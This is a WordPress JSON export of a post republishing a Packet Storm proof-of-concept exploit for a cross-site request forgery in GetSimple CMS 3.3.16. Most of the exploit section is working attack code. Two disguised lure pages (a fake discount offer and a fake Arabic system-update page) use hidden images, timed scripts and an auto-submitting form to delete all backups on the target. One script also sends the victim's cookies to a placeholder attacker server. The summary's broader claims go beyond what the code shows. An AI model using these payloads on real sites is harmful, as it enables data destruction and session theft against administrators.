{"id":31169,"date":"2025-12-15T11:42:54","date_gmt":"2025-12-15T11:42:54","guid":{"rendered":"http:\/\/localhost\/?p=31169"},"modified":"2025-12-15T11:42:54","modified_gmt":"2025-12-15T11:42:54","slug":"getsimple-cms-3316-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31169","title":{"rendered":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825"},"content":{"rendered":"

{“lastseen”:”2025-12-15T16:51:59″,”description”:”GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:212825″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-28976″],”sourceData”:”=============================================================================================================================================\\n | # Title : GetSimple CMS 3.3.16 CSRF Delete all backups without user confirmation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/GetSimpleCMS\/GetSimpleCMS |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/190425\/ \\u0026\\tCVE-2021-28976\\n \\n [+] Summary : GetSimple CMS 3.3.16 contains critical security vulnerabilities in its backup management system that allow attackers \\n to delete all backups, steal admin sessions, and access server files. These flaws require immediate patching.\\n \\t\\t\\t \\n [+] Vulnerable Code:\\n \\n backups.php – Line ~34\\n \\n \\n if (isset($_GET[‘deleteall’])){\\n check_for_csrf(\\”deleteall\\”); \/\/ CSRF check exists BUT…\\n \\n \/\/ Immediately deletes ALL files without user confirmation\\n $filenames = getFiles($path);\\n foreach ($filenames as $file) {\\n delete_file($path . $file); \/\/ Mass deletion\\n }\\n }\\n \\t\\t \\n [+] POC : poc.html\\n \\n \\n \\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\u003ctitle\\u003eSpecial Offer\\u003c\/title\\u003e\\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003ch1\\u003eLimited Time Offer!\\u003c\/h1\\u003e\\n \\u003cp\\u003eClick below to claim your discount:\\u003c\/p\\u003e\\n \\n \\u003c!– Visible attack –\\u003e\\n \\u003ca href=\\”http:\/\/localhost\/getsimple\/admin\/backups.php?deleteall=1\\u0026nonce=12345\\”\\u003e\\n Claim 50% Discount\\n \\u003c\/a\\u003e\\n \\n \\u003c!– Hidden attack –\\u003e\\n \\u003cimg src=\\”http:\/\/localhost\/getsimple\/admin\/backups.php?deleteall=1\\” \\n alt=\\”\\” style=\\”width:0;height:0;\\”\\u003e\\n \\n \\u003cscript\\u003e\\n \/\/ JavaScript automatic attack\\n setTimeout(function() {\\n var img = new Image();\\n img.src = \\”http:\/\/localhost\/getsimple\/admin\/backups.php?deleteall=1\\”;\\n }, 3000);\\n \\u003c\/script\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\n ———————\\n \\n \\u003c!– csrf_delete_all.html –\\u003e\\n \\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003e\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645\\u003c\/title\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003ch1\\u003e\u062c\u0627\u0631\u064a \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645…\\u003c\/h1\\u003e\\n \\n \\u003cform id=\\”csrfForm\\” action=\\”http:\/\/localhost\/get-simple\/admin\/backups.php\\” method=\\”GET\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”deleteall\\” value=\\”1\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”nonce\\” value=\\”invalid_nonce_but_works\\”\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cscript\\u003e\\n \/\/ \u0627\u0646\u062a\u0638\u0631 3 \u062b\u0648\u0627\u0646\u064d \u062b\u0645 \u0623\u0631\u0633\u0644 \u0627\u0644\u0646\u0645\u0648\u0630\u062c\\n setTimeout(function() {\\n document.getElementById(‘csrfForm’).submit();\\n \\n \/\/ \u0628\u0639\u062f \u0627\u0644\u062d\u0630\u0641\u060c \u062d\u0627\u0648\u0644 \u0633\u0631\u0642\u0629 \u0627\u0644\u062c\u0644\u0633\u0629\\n setTimeout(function() {\\n var img = new Image();\\n img.src = \\”https:\/\/attacker-server.com\/steal?cookie=\\” + encodeURIComponent(document.cookie) + \\n \\”\\u0026url=\\” + encodeURIComponent(window.location.href);\\n }, 2000);\\n }, 3000);\\n \\u003c\/script\\u003e\\n \\n \\u003ciframe src=\\”http:\/\/localhost\/get-simple\/admin\/backups.php\\” \\n style=\\”width:0;height:0;border:0;border:none\\”\\u003e\\u003c\/iframe\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212825″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212825\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-15T16:51:59″,”description”:”GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:212825″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-28976″],”sourceData”:”=============================================================================================================================================\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-31169","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31169\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-15T16:51:59″,”description”:”GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:212825″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-28976″],”sourceData”:”=============================================================================================================================================n...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31169\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-15T11:42:54+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825\",\"datePublished\":\"2025-12-15T11:42:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\"},\"wordCount\":674,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31169#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\",\"name\":\"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-15T11:42:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31169","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem","og_description":"{“lastseen”:”2025-12-15T16:51:59″,”description”:”GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:212825″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-28976″],”sourceData”:”=============================================================================================================================================n...","og_url":"https:\/\/zero.redgem.net\/?p=31169","og_site_name":"zero redgem","article_published_time":"2025-12-15T11:42:54+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31169#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31169"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825","datePublished":"2025-12-15T11:42:54+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31169"},"wordCount":674,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31169#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31169","url":"https:\/\/zero.redgem.net\/?p=31169","name":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-15T11:42:54+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31169#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31169"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31169#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31169","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31169"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31169\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31169"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31169"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31169"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}